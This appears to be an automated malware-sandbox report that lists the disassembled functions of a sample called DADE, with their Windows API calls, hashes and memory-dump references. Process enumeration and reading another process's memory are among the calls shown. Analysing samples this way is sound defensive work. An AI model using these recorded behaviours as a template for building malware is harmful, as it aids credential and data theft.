                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$SystemTime
                                                      • String ID: *M@
                                                      • API String ID: 684065273-4186991356
                                                      • Opcode ID: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                      • Instruction ID: b70439790c50c5c6328432dc7e4028cf2044113f60d486d5e56dbf02b5324992
                                                      • Opcode Fuzzy Hash: b737b09e2fdb8671383c258246ff60179fc49d3e631dd6ba07feedc772b9d3db
                                                      • Instruction Fuzzy Hash: 76418D31E012158FDB14CF29E984666BBF5FF08315B4A80AAE845DB3A2C779DD42CF94
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417D14
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417D2F
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,004091B6,?,?,?,?,00000000,?,00001000,?), ref: 00417D84
                                                        • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                        • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                        • Part of subcall function 00417DC0: std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                        • Part of subcall function 00417DC0: memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                                      • String ID: string too long
                                                      • API String ID: 2304785028-2556327735
                                                      • Opcode ID: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                      • Instruction ID: cceaebfc163d96aa0f8494b9eac0357faa14b69c3768ea23588e1796d2ee1bc6
                                                      • Opcode Fuzzy Hash: d1122dada4d07791fd5e4676f97221fa03903bdfbd109d0c1a1ca64d8767a8ee
                                                      • Instruction Fuzzy Hash: 0F31E5723086148BD7249E6CF880ABBF7F9EF91764B204A2BF14687741D775988183ED
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EF27A
                                                      • StrCmpCA.SHLWAPI(?,ERROR), ref: 009EF295
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 009EF2F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID: ERROR
                                                      • API String ID: 3722407311-2861137601
                                                      • Opcode ID: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                      • Instruction ID: ebdbe4cec75c553ba542849412aa652ba24121b3f23933bb61f8a7f38ada75b8
                                                      • Opcode Fuzzy Hash: da32503694cbb92f39706253748ceac56d5574eca248915fa64637d0a76e0128
                                                      • Instruction Fuzzy Hash: 6E212C706541865BCB24BF79CC56BA93BE4EF55308F008826F959DB742DB78DD00DB50
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408767
                                                        • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                        • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                      • String ID: vector<T> too long$yxxx$yxxx
                                                      • API String ID: 2884196479-1517697755
                                                      • Opcode ID: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                      • Instruction ID: e0d1b7fbc79543eee78ba1c3596c29abb19376f5ed5f905b3ee67b4588712001
                                                      • Opcode Fuzzy Hash: a9d6882bbc2a6b05e7acd6381be3345c5a12b386bb702fb3c3b73543a5313761
                                                      • Instruction Fuzzy Hash: 74F09027B100310BC314A43E9E8405FA94657E539037AD77AE986FF38DEC39EC8281D9
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(009D7B55,009D8B44,03C3C3C3,00000401,009D7B55,?,00000000,?,009D7B55,80000001), ref: 009D8DD7
                                                      • std::exception::exception.LIBCMT ref: 009D8DF2
                                                      • __CxxThrowException@8.LIBCMT ref: 009D8E07
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ??2@Exception@8Throwstd::exception::exception
                                                      • String ID: PC
                                                      • API String ID: 3448701045-2975848930
                                                      • Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                      • Instruction ID: de941a38fb66db87dd5e8d62cfff041e24aca54e3785062ce86aa09ba3d95f78
                                                      • Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                      • Instruction Fuzzy Hash: 29F0A7B164060967EB18F7A4CD467BF7378EB00304F04852AD916D2281EBB4DA0586E6
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 009EF0A6
                                                      • lstrlen.KERNEL32(00000000), ref: 009EF0B4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 009EF0DB
                                                      • lstrlen.KERNEL32(00000000), ref: 009EF0E2
                                                      • lstrcpy.KERNEL32(00000000,00435550), ref: 009EF116
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID:
                                                      • API String ID: 367037083-0
                                                      • Opcode ID: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                      • Instruction ID: 3facaf35e174447281d3edbba32fa3111e89373d55e201c0b80f41ce73a6a313
                                                      • Opcode Fuzzy Hash: 7ff5473b33befaf4bf86454810e886e9f076d7ed90fc08bef7258d5762623844
                                                      • Instruction Fuzzy Hash: 28318B71A446945BC722BF38DC86BAD7BA5EF91309F008433F8049B712DB68DC059B91
                                                      APIs
                                                        • Part of subcall function 009F7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 009F7495
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009F3C9D
                                                      • Process32First.KERNEL32(00000000,00000128), ref: 009F3CB0
                                                      • Process32Next.KERNEL32(00000000,00000128), ref: 009F3CC6
                                                        • Part of subcall function 009F75A7: lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                        • Part of subcall function 009F75A7: lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                        • Part of subcall function 009F75A7: lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                        • Part of subcall function 009F7517: lstrcpy.KERNEL32(00000000), ref: 009F7545
                                                      • CloseHandle.KERNEL32(00000000), ref: 009F3DFE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                      • String ID:
                                                      • API String ID: 1066202413-0
                                                      • Opcode ID: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                      • Instruction ID: 4613ca5da611e95c8da17667c185c57458caafca7d70d9154caf4ace0637f62b
                                                      • Opcode Fuzzy Hash: 82af6a87d116d7bb212dd170a1a9c1db20d24ae88398105aa954db5ce135ee20
                                                      • Instruction Fuzzy Hash: C281E370900208CFD715CF28D888BA5B7B5BF44329F29C1A9D5099B3E2D77A9D82CF90
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EE8F2
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EE927
                                                      • lstrcat.KERNEL32(?,00000000), ref: 009EE933
                                                      • lstrcat.KERNEL32(?,00638B00), ref: 009EE94C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      • Opcode ID: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
                                                      • Instruction ID: dc9155c1a992af4df2cd55cdeb1ea15be016a61ecba37b376010504f3a1b03d6
                                                      • Opcode Fuzzy Hash: c65d1d44db8386614dc42ff9ff295385bfe415a91f88419aa20b038886f978f3
                                                      • Instruction Fuzzy Hash: DC51E475244244AFC354EF24DC42FEA7BE9EBC8304F40C82AB95583391DE74E909CB92
                                                      APIs
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00064000,00000000), ref: 009F2469
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009F2545
                                                      • VirtualQueryEx.KERNEL32(00000000,?,?,0000001C), ref: 009F25A7
                                                      • ??_V@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009F2686), ref: 009F25B9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MemoryProcessRead$QueryVirtual
                                                      • String ID:
                                                      • API String ID: 268806267-0
                                                      • Opcode ID: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                      • Instruction ID: d33434a776b49e47fe2e673b490ed192d0f8f41415476eb25c20cbea11b058c4
                                                      • Opcode Fuzzy Hash: 657223b197f249347193c7e8189b6792d9a4a43cf19b981f0f7ccf5a3022f747
                                                      • Instruction Fuzzy Hash: F3418171A0421A9BDF20CFA4D894BBE77BAFB84724F244529FA15EB250D374DD418B90
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009E803F
                                                        • Part of subcall function 009FA457: std::exception::exception.LIBCMT ref: 009FA46C
                                                        • Part of subcall function 009FA457: __CxxThrowException@8.LIBCMT ref: 009FA481
                                                        • Part of subcall function 009FA457: std::exception::exception.LIBCMT ref: 009FA492
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009E805D
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009E8078
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,009E7F61,00000000,?,?,00000000,?,009D941D,?), ref: 009E80DB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throwmemcpy
                                                      • String ID:
                                                      • API String ID: 285807467-0
                                                      • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                      • Instruction ID: 6d015b3e0442a350306e2a0b06e0b684459c765e0e571310901fd71f60a733f3
                                                      • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                      • Instruction Fuzzy Hash: D62109313006408FC726DEADDC80B6BB7E9FF90711F20492EE5498B281DBB1DC448765
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009F35F6
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009F35FD
                                                      • GlobalMemoryStatusEx.KERNEL32 ref: 009F3618
                                                      • wsprintfA.USER32 ref: 009F363E
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                      • String ID:
                                                      • API String ID: 2922868504-0
                                                      • Opcode ID: d388b88c30a1c9dfe14523b89c4dc98b9ef3c7d404ae617fa9327a37e18e1485
                                                      • Instruction ID: 1ff099f033e1b106f1c59360207cec33486c820767897b5736a16f79ff386266
                                                      • Opcode Fuzzy Hash: d388b88c30a1c9dfe14523b89c4dc98b9ef3c7d404ae617fa9327a37e18e1485
                                                      • Instruction Fuzzy Hash: A401B5B1A04258ABD714DBA8DC46B7EB7B9EB44710F104629F906D7380D7B859008BA5
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,00000000,0042A400,000000FF), ref: 009F2D96
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009F2D9D
                                                      • GetLocalTime.KERNEL32(?), ref: 009F2DA9
                                                      • wsprintfA.USER32 ref: 009F2DD5
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                      • String ID:
                                                      • API String ID: 377395780-0
                                                      • Opcode ID: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
                                                      • Instruction ID: ef460e4f05b1cc59e4f337cdf8022e820f68ef2e8f2f31b22460d179b2b2908b
                                                      • Opcode Fuzzy Hash: c677d558a221d97c8446b2720690b2c9f8584bb4bc7dd71c902c6d27fd94e7e5
                                                      • Instruction Fuzzy Hash: 720112B2904624ABCB149BD9DD45FBFB7BDFB4CB11F00011AF645A2290E7B85940C7B5
                                                      APIs
                                                      • StrCmpCA.SHLWAPI(?,00435204), ref: 009ECCCA
                                                      • StrCmpCA.SHLWAPI(?,00432240,?,00435204), ref: 009ECCE1
                                                      • StrCmpCA.SHLWAPI(?,00435208,?,00432240,?,00435204), ref: 009ECCF8
                                                      • strtok_s.MSVCRT ref: 009ECDEE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strtok_s
                                                      • String ID:
                                                      • API String ID: 3330995566-0
                                                      • Opcode ID: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                      • Instruction ID: 85aaeb7db99fc57a6ba3c0ab42fbde9555e18906f0e4aece18c0eaa64ebc5907
                                                      • Opcode Fuzzy Hash: 1572ee6a45b470ea637e1ee38e1c5acc8a37ed15ab43c52a1683d59de8c54d74
                                                      • Instruction Fuzzy Hash: 0B01A2B1A40254ABCB129FA1DC45BAE7BA8EF10705F204466E845A7240D7B89E468EA5
                                                      APIs
                                                      • lstrlen.KERNEL32(------,009D5D82), ref: 009F75B2
                                                      • lstrcpy.KERNEL32(00000000), ref: 009F75D6
                                                      • lstrcat.KERNEL32(?,------), ref: 009F75E0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcatlstrcpylstrlen
                                                      • String ID: ------
                                                      • API String ID: 3050337572-882505780
                                                      • Opcode ID: e9db8e840e9d600a8274a4221ea649f4724d339491b5ceafd115f726d2e0478a
                                                      • Instruction ID: a7a63205aa40666df0fd297fbd587b7d09be90655f299af4df05b44ca2e4e1af
                                                      • Opcode Fuzzy Hash: e9db8e840e9d600a8274a4221ea649f4724d339491b5ceafd115f726d2e0478a
                                                      • Instruction Fuzzy Hash: 10F039749043028FCB209F75DC88926BBFAEF84745314882DB88AC3214EB34D840CF60
                                                      APIs
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D169E
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16C0
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D16E2
                                                        • Part of subcall function 009D1677: lstrcpy.KERNEL32(00000000,?), ref: 009D1746
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E3A35
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E3A5E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E3A84
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009E3AAA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy
                                                      • String ID:
                                                      • API String ID: 3722407311-0
                                                      • Opcode ID: 4f5455d5a6caf262ba9af6d4110dc9b7c3ee76a676099707a0edce832b74f1ee
                                                      • Instruction ID: e90bbec360614187c1b06e8cd501629475c112fae6e8f5b307a56bc869e776ef
                                                      • Opcode Fuzzy Hash: 4f5455d5a6caf262ba9af6d4110dc9b7c3ee76a676099707a0edce832b74f1ee
                                                      • Instruction Fuzzy Hash: ED12DD70A112418FDB29CF1AC558B25B7E9AF44718B2DC1ADD809DB3A2D772DD82CF90
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040880C
                                                      • memcpy.MSVCRT(?,?,00000000,00000000,004077D7), ref: 00408852
                                                        • Part of subcall function 004089B0: std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                                      • String ID: string too long
                                                      • API String ID: 2304785028-2556327735
                                                      • Opcode ID: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                      • Instruction ID: 5d491b80eb8bee1d23d11014c6f0c6c09838216a0de1fe5473ebb2330092f83f
                                                      • Opcode Fuzzy Hash: 510cf4668b88527fe00a13118a3b5303f5f61e3204e0d9fa691029505446f86d
                                                      • Instruction Fuzzy Hash: 9421A1613006504BDB259A6C8B84A2AB7E5AB82700B64493FF0D1D77C1DFB9DC40879D
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009D8B1A
                                                        • Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA41F
                                                        • Part of subcall function 009FA40A: __CxxThrowException@8.LIBCMT ref: 009FA434
                                                        • Part of subcall function 009FA40A: std::exception::exception.LIBCMT ref: 009FA445
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                      • String ID: yxxx$yxxx
                                                      • API String ID: 1823113695-1021751087
                                                      • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                      • Instruction ID: e83c433dcba50ec502fa6f3014039e3f463c7999974a6b31344b31588c504ba7
                                                      • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                      • Instruction Fuzzy Hash: 8F3179B5E005199BCB08DF58C8916AEBBB6EB88310F14C26AE9159F385DB34A901CBD1
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00408AA5
                                                        • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                        • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                      • memcpy.MSVCRT(?,?,?), ref: 00408AEF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
